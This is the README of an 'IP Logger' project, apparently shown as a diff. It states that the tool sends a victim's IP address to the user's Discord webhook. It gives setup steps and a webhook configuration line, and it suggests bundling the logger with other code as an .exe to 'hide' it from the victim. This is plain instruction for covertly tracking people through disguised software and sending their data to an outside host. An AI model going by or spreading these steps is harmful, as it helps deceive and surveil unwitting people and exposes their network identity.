MattyTM/IP-Logger/README.md

 Simple IP Logger that sends the victim ip to your Discord Webhook

 # Steps
+open a cmd inside the folder of the script write "pip install -r requirements.txt"
 You have to put a Webhook on Line 12: "webhook = DiscordWebhook(url='YOUR WEBHOOK')" After line 19 you can add your own code and give it to the victim as an .exe or whatever you want to "hide" the ip logger